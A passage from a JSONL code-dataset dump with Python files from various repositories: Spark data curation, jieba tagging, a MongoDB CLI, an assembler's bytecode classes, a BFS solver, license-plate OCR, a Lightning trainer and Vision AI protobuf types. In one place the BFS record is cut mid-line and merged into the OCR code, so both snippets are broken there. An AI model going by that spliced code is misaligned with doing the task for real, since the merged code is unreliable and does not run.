variables\nindex = \"bike2_sensors\"\nindex_output = \"pivoted_sensors\"\ndoc_type = \"IoT\" \n\n#input\ndf = sf.elastic2df(es,index,doc_type,sqlContext)\n\n#transformations\ndf = sf.transform(df)\ndf_full = sf.pivoting(df)\n\nsf.df2elastic(es,index_output,doc_type,df_full)\n\npath = '/home/marcroig/Desktop/data/reports/pivoted_report.html'\nsf.createReport(df_full,path)\n\n\n", "repo_name": "marcroiglama/GIVO", "sub_path": "Data Preparation Layer/Data Curation module/curation_main.py", "file_name": "curation_main.py", "file_ext": "py", "file_size_in_byte": 1474, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "86", "api": [{"api_name": "time.time", "line_number": 7, "usage_type": "call"}, {"api_name": "pyspark.sql.SparkSession.builder.appName", "line_number": 10, "usage_type": "call"}, {"api_name": "pyspark.sql.SparkSession.builder", "line_number": 10, "usage_type": "attribute"}, {"api_name": "pyspark.sql.SparkSession", "line_number": 10, "usage_type": "name"}, {"api_name": "pyspark.sql.SQLContext", "line_number": 11, "usage_type": "call"}, {"api_name": "elasticsearch.Elasticsearch", "line_number": 12, "usage_type": "call"}, {"api_name": "spark_functions.elastic2df", "line_number": 22, "usage_type": "call"}, {"api_name": "pyspark.sql.functions.col", "line_number": 23, "usage_type": "call"}, {"api_name": "pyspark.sql.functions.col", "line_number": 24, "usage_type": "call"}, {"api_name": "pyspark.sql.functions.col", "line_number": 26, "usage_type": "call"}, {"api_name": "pyspark.sql.functions.col", "line_number": 27, "usage_type": "call"}, {"api_name": "spark_functions.df2elastic", "line_number": 30, "usage_type": "call"}, {"api_name": "time.time", "line_number": 32, "usage_type": "call"}]} +{"seq_id": "19784992703", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport fire\nimport json\nimport jieba\n\njieba.load_userdict(\"tags.dict\")\n\n\ndef extract_tags(line):\n tags = list()\n cuts = jieba.cut(line, cut_all=False, HMM=False)\n res = list(cuts)\n for i, word in enumerate(res):\n if word == ':':\n tags.append(res[i - 1])\n\n return tags\n\n\n@fire.Fire\ndef get_all_tags(input, output):\n tag_count = {}\n with open(input) as in_f, open(output, 'w') as out_f:\n for line in in_f:\n tags = extract_tags(line)\n for tag in tags:\n if tag.isascii():\n continue\n if tag in tag_count:\n tag_count[tag] += 1\n else:\n tag_count[tag] = 1\n\n json.dump(tag_count, out_f)\n", "repo_name": "dragonkid/portrait", "sub_path": "get_all_tags.py", "file_name": "get_all_tags.py", "file_ext": "py", "file_size_in_byte": 803, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "jieba.load_userdict", "line_number": 7, "usage_type": "call"}, {"api_name": "jieba.cut", "line_number": 12, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 35, "usage_type": "call"}, {"api_name": "fire.Fire", "line_number": 21, "usage_type": "attribute"}]} +{"seq_id": "21694822711", "text": "from commands import search_tag, search_tags, search_name\nfrom mongoengine import disconnect\n\n\nif __name__ == \"__main__\":\n while True:\n command = input(\"Type a command as 'command: search'\\n>>> \")\n to_do = command.split(\":\")[0].strip()\n search = command.split(\":\")[1].strip()\n if to_do in [\"tag\", \"tags\", \"name\"]:\n if to_do == \"tag\":\n print(search_tag(search))\n elif to_do == \"tags\":\n tags = [tag.strip() for tag in search.split(\",\")]\n print(search_tags(tags))\n else:\n print(search_name(search))\n elif to_do == \"exit\":\n break\n else:\n print(\"Wrong command\")\n\n disconnect()\n", "repo_name": "MartynyukAndriy/Go_It_Python_Web", "sub_path": "HW8/Mongo/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 735, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "commands.search_tag", "line_number": 12, "usage_type": "call"}, {"api_name": "commands.search_tags", "line_number": 15, "usage_type": "call"}, {"api_name": "commands.search_name", "line_number": 17, "usage_type": "call"}, {"api_name": "mongoengine.disconnect", "line_number": 23, "usage_type": "call"}]} +{"seq_id": "180980065", "text": "from __future__ import annotations\nfrom functools import reduce\nimport sys\n\nfrom bespokeasm.assembler.line_identifier import LineIdentifier\nfrom bespokeasm.assembler.label_scope import LabelScope\nfrom bespokeasm.assembler.memory_zone import MemoryZone\nfrom bespokeasm.expression import parse_expression\n\nfrom .packed_bits import PackedBits\n\n\nclass ByteCodePart:\n def __init__(self, value_size: int, byte_align: bool, endian: str, line_id: LineIdentifier) -> None:\n self._value_size = value_size\n self._byte_align = byte_align\n self._endian = endian\n self._line_id = line_id\n\n @property\n def value_size(self) -> int:\n return self._value_size\n\n @property\n def byte_align(self) -> bool:\n return self._byte_align\n\n @property\n def endian(self) -> str:\n return self._endian\n\n @property\n def line_id(self) -> LineIdentifier:\n return self._line_id\n\n def __repr__(self) -> str:\n return str(self)\n\n def __str__(self) -> str:\n raise NotImplementedError\n\n def __eq__(self, other: ByteCodePart) -> bool:\n return \\\n self._value_size == other._value_size \\\n and self._byte_align == other._byte_align \\\n and self._endian == other._endian\n\n @property\n def instruction_string(self) -> str:\n sys.exit(f'ERROR: INTERNAL - fetching ByteCodePart instruction string unimplemented for: {self}')\n\n def get_value(self, label_scope: LabelScope, instruction_address: int, instruction_size: int) -> int:\n # this should be overridden\n raise NotImplementedError\n\n def contains_register_labels(self, register_labels: set[str]) -> bool:\n return False\n\n\nclass NumericByteCodePart(ByteCodePart):\n def __init__(self, value: int, value_size: int, byte_align: bool, endian: str, line_id: LineIdentifier) -> None:\n super().__init__(value_size, byte_align, endian, line_id)\n self._value = value\n\n @property\n def instruction_string(self) -> str:\n return str(self._value)\n\n def __str__(self) -> str:\n return f'NumericByteCodePart'\n\n def get_value(self, label_scope: LabelScope, instruction_address: int, instruction_size: int) -> int:\n return self._value\n\n\nclass ExpressionByteCodePart(ByteCodePart):\n def __init__(\n self,\n value_expression: str,\n value_size: int,\n byte_align: bool,\n endian: str,\n line_id: LineIdentifier,\n ) -> None:\n super().__init__(value_size, byte_align, endian, line_id)\n self._expression = value_expression\n self._parsed_expression = parse_expression(self.line_id, self._expression)\n\n @property\n def instruction_string(self) -> str:\n return self._expression.strip()\n\n def __str__(self) -> str:\n return f'ExpressionByteCodePart'\n\n def get_value(self, label_scope: LabelScope, instruction_address: int, instruction_size: int) -> int:\n value = self._parsed_expression.get_value(label_scope, self.line_id)\n if isinstance(value, str):\n sys.exit(f'ERROR: {self.line_id} - expression \"{self._expression}\" did not resolve to an int, got: {value}')\n return value\n\n def contains_register_labels(self, register_labels: set[str]) -> bool:\n return self._parsed_expression.contains_register_labels(register_labels)\n\n\nclass ExpressionByteCodePartWithValidation(ExpressionByteCodePart):\n def __init__(\n self,\n max_value: int,\n min_value: int,\n value_expression: str,\n value_size: int,\n byte_align: bool,\n endian: str,\n line_id: LineIdentifier\n ) -> None:\n super().__init__(value_expression, value_size, byte_align, endian, line_id)\n self._max = max_value\n self._min = min_value\n\n def __str__(self) -> str:\n return f'ExpressionByteCodePartWithValidation'\n\n def get_value(self, label_scope: LabelScope, instruction_address: int, instruction_size: int) -> int:\n value = super().get_value(label_scope, instruction_address, instruction_size)\n if self._max is not None and value > self._max:\n sys.exit(f'ERROR: {self.line_id} - operand value of {value} exceeds maximun allowed of {self._max}')\n if self._min is not None and value < self._min:\n sys.exit(f'ERROR: {self.line_id} - operand value of {value} is less than minimum allowed of {self._min}')\n return value\n\n\nclass ExpressionByteCodePartInMemoryZone(ExpressionByteCodePart):\n def __init__(\n self,\n memzone: MemoryZone,\n value_expression: str,\n value_size: int,\n byte_align: bool,\n endian: str,\n line_id: LineIdentifier,\n ) -> None:\n super().__init__(value_expression, value_size, byte_align, endian, line_id)\n self._memzone = memzone\n\n def __str__(self) -> str:\n return f'ExpressionByteCodePartInMemoryZone'\n\n def get_value(self, label_scope: LabelScope, instruction_address: int, instruction_size: int) -> int:\n value = super().get_value(label_scope, instruction_address, instruction_size)\n if self._memzone is not None:\n if value > self._memzone.end:\n sys.exit(\n f'ERROR: {self.line_id} - address value of {value} exceeds maximun allowed '\n f'address of {self._memzone.end} in memory zone {self._memzone.name}'\n )\n if value < self._memzone.start:\n sys.exit(\n f'ERROR: {self.line_id} - address value of {value} is less than minimum allowed '\n f'address of {self._memzone.start} in memory zone {self._memzone.name}'\n )\n return value\n\n\nclass ExpressionEnumerationByteCodePart(ExpressionByteCodePart):\n def __init__(\n self,\n value_dict: dict[int, int],\n value_expression: str,\n value_size: int,\n byte_align: bool,\n endian: str,\n line_id: LineIdentifier\n ) -> None:\n super().__init__(value_expression, value_size, byte_align, endian, line_id)\n self._value_dict = value_dict\n\n def __str__(self) -> str:\n return f'ExpressionEnumerationByteCodePart'\n\n def get_value(self, label_scope: LabelScope, instruction_address: int, instruction_size: int) -> int:\n value = super().get_value(label_scope, instruction_address, instruction_size)\n if value not in self._value_dict:\n sys.exit(\n f'ERROR: {self.line_id} - numeric expression value of {value} is '\n f'not an allowed value for numeric enumeration.'\n )\n return self._value_dict[value]\n\n\nclass CompositeByteCodePart(ByteCodePart):\n _parts_list: list[ByteCodePart]\n\n def __init__(self, bytecode_parts: list[ByteCodePart], byte_align: bool, endian: str, line_id: LineIdentifier) -> None:\n total_size = reduce(lambda a, b: a+b.value_size, bytecode_parts, 0)\n super().__init__(total_size, byte_align, endian, line_id)\n self._parts_list = bytecode_parts\n\n def __str__(self) -> str:\n return f'CompositeByteCodePart'\n\n def get_value(self, label_scope: LabelScope, instruction_address: int, instruction_size: int) -> int:\n bits = PackedBits()\n for p in self._parts_list:\n bits.append_bits(\n p.get_value(\n label_scope,\n instruction_address,\n instruction_size,\n ),\n p.value_size,\n False,\n self.endian,\n )\n value = int.from_bytes(bits.get_bytes(), self.endian)\n if self.value_size % 8 != 0:\n shift_count = 8 - (self.value_size % 8)\n value = value >> shift_count\n return value\n", "repo_name": "michaelkamprath/bespokeasm", "sub_path": "src/bespokeasm/assembler/bytecode/parts.py", "file_name": "parts.py", "file_ext": "py", "file_size_in_byte": 8255, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 16, "dataset": "github-code", "pt": "86", "api": [{"api_name": "bespokeasm.assembler.line_identifier.LineIdentifier", "line_number": 14, "usage_type": "name"}, {"api_name": "bespokeasm.assembler.line_identifier.LineIdentifier", "line_number": 33, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 50, "usage_type": "call"}, {"api_name": "bespokeasm.assembler.label_scope.LabelScope", "line_number": 52, "usage_type": "name"}, {"api_name": "bespokeasm.assembler.line_identifier.LineIdentifier", "line_number": 61, "usage_type": "name"}, {"api_name": "bespokeasm.assembler.label_scope.LabelScope", "line_number": 72, "usage_type": "name"}, {"api_name": "bespokeasm.assembler.line_identifier.LineIdentifier", "line_number": 83, "usage_type": "name"}, {"api_name": "bespokeasm.expression.parse_expression", "line_number": 87, "usage_type": "call"}, {"api_name": "bespokeasm.assembler.label_scope.LabelScope", "line_number": 96, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 99, "usage_type": "call"}, {"api_name": "bespokeasm.assembler.line_identifier.LineIdentifier", "line_number": 115, "usage_type": "name"}, {"api_name": "bespokeasm.assembler.label_scope.LabelScope", "line_number": 124, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 127, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 129, "usage_type": "call"}, {"api_name": "bespokeasm.assembler.memory_zone.MemoryZone", "line_number": 136, "usage_type": "name"}, {"api_name": "bespokeasm.assembler.line_identifier.LineIdentifier", "line_number": 141, "usage_type": "name"}, {"api_name": "bespokeasm.assembler.label_scope.LabelScope", "line_number": 149, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 153, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 158, "usage_type": "call"}, {"api_name": "bespokeasm.assembler.line_identifier.LineIdentifier", "line_number": 173, "usage_type": "name"}, {"api_name": "bespokeasm.assembler.label_scope.LabelScope", "line_number": 181, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 184, "usage_type": "call"}, {"api_name": "bespokeasm.assembler.line_identifier.LineIdentifier", "line_number": 194, "usage_type": "name"}, {"api_name": "functools.reduce", "line_number": 195, "usage_type": "call"}, {"api_name": "bespokeasm.assembler.label_scope.LabelScope", "line_number": 202, "usage_type": "name"}, {"api_name": "packed_bits.PackedBits", "line_number": 203, "usage_type": "call"}]} +{"seq_id": "70373552605", "text": "from collections import deque\r\nimport sys\r\ndef init(n,m,k)->list:\r\n return [ [int(j) for j in sys.stdin.readline().rstrip()] for i in range(n)]\r\ndef BFS(maze:list,k:int)->int:\r\n q=deque([(0,0,0)])#현 위치,부신벽의 갯수\r\n dp=[ [ [0]*len(maze[0]) for i in range(len(maze))] for _ in range(k+1) ]\r\n dp[0][0][0]=1\r\n indexInfo=list(zip([-1,0,1,0],[0,1,0,-1]))\r\n while q:\r\n curI,curJ,curSmashed=q.popleft()\r\n if curI==len(maze)-1 and curJ==len(maze[0])-1 and 0<=curSmashed<=k: return dp[curSmashed][curI][curJ]\r\n for i,j in indexInfo:\r\n newI=curI+i;newJ=curJ+j\r\n if 0<=newI 1000 and area < 3000:\n x, y, w, h = cv2.boundingRect(c)\n ROI = 255 - thresh[(y - 8):(y+h+8), (x-8):(x+w+8)] # just inverts the colors\n ROI = cv2.resize(ROI, dsize = (100, 100), interpolation = cv2.INTER_LANCZOS4)\n result.append(ROI)\n # cv2.drawContours(mask, [c], -1, (255, 255, 255), -1)\n # cv2.imwrite('ROI_{}.png'.format(ROI_number), ROI) # this exports an image file\n # ROI_number += 1\n return result\n\nindiv_digits = plate_digits(zoom_plate)\n# for d in indiv_digits:\n# cv2.imshow('digit', d) # will pop up in a separate window\n# cv2.waitKey()\n", "repo_name": "jaotheboss/License-Plate-Reading-OCR", "sub_path": "license_plate.py", "file_name": "license_plate.py", "file_ext": "py", "file_size_in_byte": 5292, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "cv2.imread", "line_number": 8, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 9, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 9, "usage_type": "attribute"}, {"api_name": "cv2.CascadeClassifier", "line_number": 15, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 48, "usage_type": "name"}, {"api_name": "cv2.resize", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 75, "usage_type": "call"}, {"api_name": "cv2.filter2D", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 83, "usage_type": "name"}, {"api_name": "pytesseract.image_to_string", "line_number": 88, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 91, "usage_type": "call"}, {"api_name": "re.search", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 109, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 109, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 110, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 110, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 111, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY_INV", "line_number": 111, "usage_type": "attribute"}, {"api_name": "cv2.THRESH_OTSU", "line_number": 111, "usage_type": "attribute"}, {"api_name": "cv2.findContours", "line_number": 113, "usage_type": "call"}, {"api_name": "cv2.RETR_TREE", "line_number": 113, "usage_type": "attribute"}, {"api_name": "cv2.CHAIN_APPROX_SIMPLE", "line_number": 113, "usage_type": "attribute"}, {"api_name": "imutils.contours.sort_contours", "line_number": 115, "usage_type": "call"}, {"api_name": "imutils.contours", "line_number": 115, "usage_type": "name"}, {"api_name": "cv2.contourArea", "line_number": 119, "usage_type": "call"}, {"api_name": "cv2.boundingRect", "line_number": 121, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 123, "usage_type": "call"}, {"api_name": "cv2.INTER_LANCZOS4", "line_number": 123, "usage_type": "attribute"}]} +{"seq_id": "12135442283", "text": "from typing import Dict, Union\nimport pytorch_lightning as pl\nfrom colorama import Fore\nfrom pytorch_lightning.callbacks import ModelCheckpoint, EarlyStopping, RichProgressBar\nfrom torch.utils.data import DataLoader\nfrom general_files.utils.common_util import CustomCometLoggerForPL, get_logger\nfrom general_files.utils.data_util import dict_list_to_tensor\n\nlog = get_logger(__name__)\n\n\nclass ModelTrainer:\n def __init__(\n self,\n config,\n model,\n train_dataset,\n eval_dataset,\n tokenizer,\n experiment,\n ):\n if config.stage == 'finetune':\n # 因为框架的特殊性,如果不设置这里模型会从ckpt的断点继续训练\n # 如果想只加载模型权重,需要下面的设置\n config.ckpt_path = None\n self.config = config\n self.model = model\n self.config.dataset_size = len(train_dataset)\n self.model.train_dataset = train_dataset\n self.model.val_dataset = eval_dataset\n\n class DataModule(pl.LightningDataModule):\n def __init__(self, train_dataset, eval_dataset, collate_fn):\n super().__init__()\n self.train_dataset, self.eval_dataset = train_dataset, eval_dataset\n self.collate_fn = collate_fn\n\n def train_dataloader(self):\n return DataLoader(self.train_dataset,\n batch_size=config.train_batch_size,\n shuffle=True,\n pin_memory=config.dataloader_pin_memory,\n num_workers=config.dataloader_num_workers,\n collate_fn=self.collate_fn\n )\n\n def val_dataloader(self):\n return DataLoader(self.eval_dataset,\n batch_size=config.train_batch_size,\n shuffle=True,\n pin_memory=config.dataloader_pin_memory,\n num_workers=config.dataloader_num_workers,\n collate_fn=self.collate_fn)\n self.data_module = DataModule(train_dataset, eval_dataset, self.collate_fn)\n\n self.tokenizer = tokenizer\n if experiment:\n logger = CustomCometLoggerForPL()\n logger._experiment = experiment\n else:\n logger = None\n\n class LiteProgressBar(pl.callbacks.progress.TQDMProgressBar):\n def __init__(self, refresh_rate: int = 1, process_position: int = 0):\n super().__init__(refresh_rate, process_position)\n\n def get_metrics(self, trainer: \"pl.Trainer\", pl_module: \"pl.LightningModule\") -> Dict[str, Union[int, str]]:\n items = super().get_metrics(trainer, pl_module)\n # items['ppl'] = round(items['ppl'], 1) if 'ppl' in items else None\n items['lr'] = round(items['lr'], 7) if 'lr' in items else None\n items.pop(\"v_num\", None)\n return items\n\n def init_train_tqdm(self):\n bar = super().init_train_tqdm()\n bar.bar_format = '%s{l_bar}%s{bar}%s{r_bar}' % (Fore.GREEN, Fore.GREEN, Fore.GREEN)\n return bar\n\n def init_validation_tqdm(self):\n bar = super().init_validation_tqdm()\n bar.set_description('Validating')\n bar.bar_format = '%s{l_bar}%s{bar}%s{r_bar}' % (Fore.GREEN, Fore.GREEN, Fore.GREEN)\n bar.leave = False\n return bar\n\n checkpoint_callback = ModelCheckpoint(monitor=config.checkpoint_monitor,\n mode=config.checkpoint_monitr_mode,\n save_top_k=config.save_total_limit,\n save_last=True,\n verbose=True,\n dirpath=config.result_path,\n filename=\"best_model\",\n auto_insert_metric_name=False,\n )\n\n early_stop_callback = EarlyStopping(\n monitor=config.checkpoint_monitor,\n min_delta=0.001,\n patience=5,\n verbose=True,\n mode=config.checkpoint_monitr_mode,\n )\n\n # Explicitly specify the process group backend if you choose to\n callbacks = [checkpoint_callback,\n early_stop_callback,\n LiteProgressBar(),\n ]\n\n self.trainer = pl.Trainer(logger=logger,\n callbacks=callbacks,\n **config.pl_train_args)\n\n def collate_fn(self, batch):\n return dict_list_to_tensor(batch)\n\n def train(self):\n if self.config.pl_train_args.auto_lr_find:\n lr_finder = self.trainer.tuner.lr_find(self.model, datamodule=self.data_module)\n # 展示loss和学习率的曲线\n fig = lr_finder.plot(suggest=True)\n fig.show()\n # 设置为推荐的学习率\n self.model.config.lr = lr_finder.suggestion()\n self.trainer.fit(model=self.model,\n datamodule=self.data_module\n )\n", "repo_name": "Xingxl2studious/baseline", "sub_path": "general_files/trainer/base_trainer.py", "file_name": "base_trainer.py", "file_ext": "py", "file_size_in_byte": 5475, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "86", "api": [{"api_name": "general_files.utils.common_util.get_logger", "line_number": 9, "usage_type": "call"}, {"api_name": "pytorch_lightning.LightningDataModule", "line_number": 32, "usage_type": "attribute"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 39, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 48, "usage_type": "call"}, {"api_name": "general_files.utils.common_util.CustomCometLoggerForPL", "line_number": 58, "usage_type": "call"}, {"api_name": "pytorch_lightning.callbacks", "line_number": 63, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 67, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 67, "usage_type": "name"}, {"api_name": "colorama.Fore.GREEN", "line_number": 76, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 76, "usage_type": "name"}, {"api_name": "colorama.Fore.GREEN", "line_number": 82, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 82, "usage_type": "name"}, {"api_name": "pytorch_lightning.callbacks.ModelCheckpoint", "line_number": 86, "usage_type": "call"}, {"api_name": "pytorch_lightning.callbacks.EarlyStopping", "line_number": 96, "usage_type": "call"}, {"api_name": "pytorch_lightning.Trainer", "line_number": 110, "usage_type": "call"}, {"api_name": "general_files.utils.data_util.dict_list_to_tensor", "line_number": 115, "usage_type": "call"}]} +{"seq_id": "41831813012", "text": "from pip._vendor import requests\n\n\nENTRIES = [\n \"Austria\".lower(),\n \"Belgium\".lower(),\n \"Denmark\".lower(),\n \"Finland\".lower(),\n \"France\".lower(),\n \"Germany\".lower(),\n \"Greece\".lower(),\n \"Iceland\".lower(),\n \"Ireland\".lower(),\n \"Israel\".lower(),\n \"Italy\".lower(),\n \"Luxembourg\".lower(),\n \"Netherlands\".lower(),\n \"Norway\".lower(),\n \"Portugal\".lower(),\n \"Spain\".lower(),\n \"Sweden\".lower(),\n \"Switzerland\".lower(),\n \"Turkey\".lower(),\n \"United Kingdom\".lower(),\n \"Yugoslavia\".lower(),\n]\n\nclass State:\n\n def __init__(self):\n self.current_votes_list = dict()\n\n def change_name(self, name):\n self.current_voter = name\n requests.post(\"http://localhost:5000/name\", {\n \"name\": name\n })\n\n def finish_voting(self, exporter):\n # print(f\"{self.current_voter} done! scores {self.current_votes_list}\")\n exporter.add_votes(self.current_votes_list, self.current_voter)\n requests.post(\"http://localhost:5000/reset\", {})\n\n def add_vote(self, country, previous_rank, new_rank):\n self.current_votes_list[country] = new_rank\n requests.post(\"http://localhost:5000/vote\", {\n \"country\": country,\n \"previous_rank\": previous_rank,\n \"new_rank\": new_rank\n })\n\n def cancel_vote(self):\n requests.post(\"http://localhost:5000/cancel\", {})\nhistory = []\n\n\nVOTERS = [\"Marko\", \"Ed\", \"Rinor\", \"Luke\", \"Simon\", \"Matteo\", \"Costa\", \"Rodrigo\", \"Pedro\", \"Vladan\", \"Philip\", \"Oliver\", \"Thomas\", \"Nathan\", \"Wiv\", \"Hlynur\", \"Aivis\"]\n", "repo_name": "marko-travelperk/ESCScoreboard", "sub_path": "ESCScoreboard-BE/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 1583, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "pip._vendor.requests.post", "line_number": 35, "usage_type": "call"}, {"api_name": "pip._vendor.requests", "line_number": 35, "usage_type": "name"}, {"api_name": "pip._vendor.requests.post", "line_number": 42, "usage_type": "call"}, {"api_name": "pip._vendor.requests", "line_number": 42, "usage_type": "name"}, {"api_name": "pip._vendor.requests.post", "line_number": 46, "usage_type": "call"}, {"api_name": "pip._vendor.requests", "line_number": 46, "usage_type": "name"}, {"api_name": "pip._vendor.requests.post", "line_number": 53, "usage_type": "call"}, {"api_name": "pip._vendor.requests", "line_number": 53, "usage_type": "name"}]} +{"seq_id": "69941883805", "text": "from __future__ import annotations\n\nfrom typing import MutableMapping, MutableSequence\n\nimport proto # type: ignore\n\nfrom visionai.python.gapic.visionai.visionai_v1.types import lva\nfrom google.protobuf import timestamp_pb2 # type: ignore\n\n\n__protobuf__ = proto.module(\n package='google.cloud.visionai.v1',\n manifest={\n 'Operator',\n 'Analysis',\n 'Process',\n },\n)\n\n\nclass Operator(proto.Message):\n r\"\"\"Message describing the Operator object.\n\n Attributes:\n name (str):\n Name of the resource.\n create_time (google.protobuf.timestamp_pb2.Timestamp):\n Output only. The create timestamp.\n update_time (google.protobuf.timestamp_pb2.Timestamp):\n Output only. The update timestamp.\n labels (MutableMapping[str, str]):\n Labels as key value pairs.\n operator_definition (google.cloud.visionai_v1.types.OperatorDefinition):\n The definition of the operator.\n docker_image (str):\n The link to the docker image of the operator.\n \"\"\"\n\n name: str = proto.Field(\n proto.STRING,\n number=1,\n )\n create_time: timestamp_pb2.Timestamp = proto.Field(\n proto.MESSAGE,\n number=2,\n message=timestamp_pb2.Timestamp,\n )\n update_time: timestamp_pb2.Timestamp = proto.Field(\n proto.MESSAGE,\n number=3,\n message=timestamp_pb2.Timestamp,\n )\n labels: MutableMapping[str, str] = proto.MapField(\n proto.STRING,\n proto.STRING,\n number=4,\n )\n operator_definition: lva.OperatorDefinition = proto.Field(\n proto.MESSAGE,\n number=5,\n message=lva.OperatorDefinition,\n )\n docker_image: str = proto.Field(\n proto.STRING,\n number=6,\n )\n\n\nclass Analysis(proto.Message):\n r\"\"\"Message describing the Analysis object.\n\n Attributes:\n name (str):\n The name of resource.\n create_time (google.protobuf.timestamp_pb2.Timestamp):\n Output only. The create timestamp.\n update_time (google.protobuf.timestamp_pb2.Timestamp):\n Output only. The update timestamp.\n labels (MutableMapping[str, str]):\n Labels as key value pairs.\n analysis_definition (google.cloud.visionai_v1.types.AnalysisDefinition):\n The definition of the analysis.\n input_streams_mapping (MutableMapping[str, str]):\n Map from the input parameter in the definition to the real\n stream. E.g., suppose you had a stream source operator named\n \"input-0\" and you try to receive from the real stream\n \"stream-0\". You can add the following mapping: [input-0:\n stream-0].\n output_streams_mapping (MutableMapping[str, str]):\n Map from the output parameter in the definition to the real\n stream. E.g., suppose you had a stream sink operator named\n \"output-0\" and you try to send to the real stream\n \"stream-0\". You can add the following mapping: [output-0:\n stream-0].\n disable_event_watch (bool):\n Boolean flag to indicate whether you would\n like to disable the ability to automatically\n start a Process when new event happening in the\n input Stream. If you would like to start a\n Process manually, the field needs to be set to\n true.\n \"\"\"\n\n name: str = proto.Field(\n proto.STRING,\n number=1,\n )\n create_time: timestamp_pb2.Timestamp = proto.Field(\n proto.MESSAGE,\n number=2,\n message=timestamp_pb2.Timestamp,\n )\n update_time: timestamp_pb2.Timestamp = proto.Field(\n proto.MESSAGE,\n number=3,\n message=timestamp_pb2.Timestamp,\n )\n labels: MutableMapping[str, str] = proto.MapField(\n proto.STRING,\n proto.STRING,\n number=4,\n )\n analysis_definition: lva.AnalysisDefinition = proto.Field(\n proto.MESSAGE,\n number=5,\n message=lva.AnalysisDefinition,\n )\n input_streams_mapping: MutableMapping[str, str] = proto.MapField(\n proto.STRING,\n proto.STRING,\n number=6,\n )\n output_streams_mapping: MutableMapping[str, str] = proto.MapField(\n proto.STRING,\n proto.STRING,\n number=7,\n )\n disable_event_watch: bool = proto.Field(\n proto.BOOL,\n number=8,\n )\n\n\nclass Process(proto.Message):\n r\"\"\"Message describing the Process object.\n\n Attributes:\n name (str):\n The name of resource.\n create_time (google.protobuf.timestamp_pb2.Timestamp):\n Output only. The create timestamp.\n update_time (google.protobuf.timestamp_pb2.Timestamp):\n Output only. The update timestamp.\n analysis (str):\n Required. Reference to an existing Analysis\n resource.\n attribute_overrides (MutableSequence[str]):\n Optional. Attribute overrides of the Analyzers. Format for\n each single override item:\n \"{analyzer_name}:{attribute_key}={value}\".\n run_status (google.cloud.visionai_v1.types.RunStatus):\n Optional. Status of the Process.\n run_mode (google.cloud.visionai_v1.types.RunMode):\n Optional. Run mode of the Process.\n event_id (str):\n Optional. Event ID of the input/output\n streams. This is useful when you have a\n StreamSource/StreamSink operator in the\n Analysis, and you want to manually specify the\n Event to read from/write to.\n batch_id (str):\n Optional. Optional: Batch ID of the Process.\n retry_count (int):\n Optional. Optional: The number of retries for\n a process in submission mode\n the system should try before declaring failure.\n By default, no retry will be performed.\n \"\"\"\n\n name: str = proto.Field(\n proto.STRING,\n number=1,\n )\n create_time: timestamp_pb2.Timestamp = proto.Field(\n proto.MESSAGE,\n number=2,\n message=timestamp_pb2.Timestamp,\n )\n update_time: timestamp_pb2.Timestamp = proto.Field(\n proto.MESSAGE,\n number=3,\n message=timestamp_pb2.Timestamp,\n )\n analysis: str = proto.Field(\n proto.STRING,\n number=4,\n )\n attribute_overrides: MutableSequence[str] = proto.RepeatedField(\n proto.STRING,\n number=5,\n )\n run_status: lva.RunStatus = proto.Field(\n proto.MESSAGE,\n number=6,\n message=lva.RunStatus,\n )\n run_mode: lva.RunMode = proto.Field(\n proto.ENUM,\n number=7,\n enum=lva.RunMode,\n )\n event_id: str = proto.Field(\n proto.STRING,\n number=8,\n )\n batch_id: str = proto.Field(\n proto.STRING,\n number=9,\n )\n retry_count: int = proto.Field(\n proto.INT32,\n number=10,\n )\n\n\n__all__ = tuple(sorted(__protobuf__.manifest))\n", "repo_name": "google/visionai", "sub_path": "visionai/python/gapic/visionai/visionai_v1/types/lva_resources.py", "file_name": "lva_resources.py", "file_ext": "py", "file_size_in_byte": 7025, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 40, "dataset": "github-code", "pt": 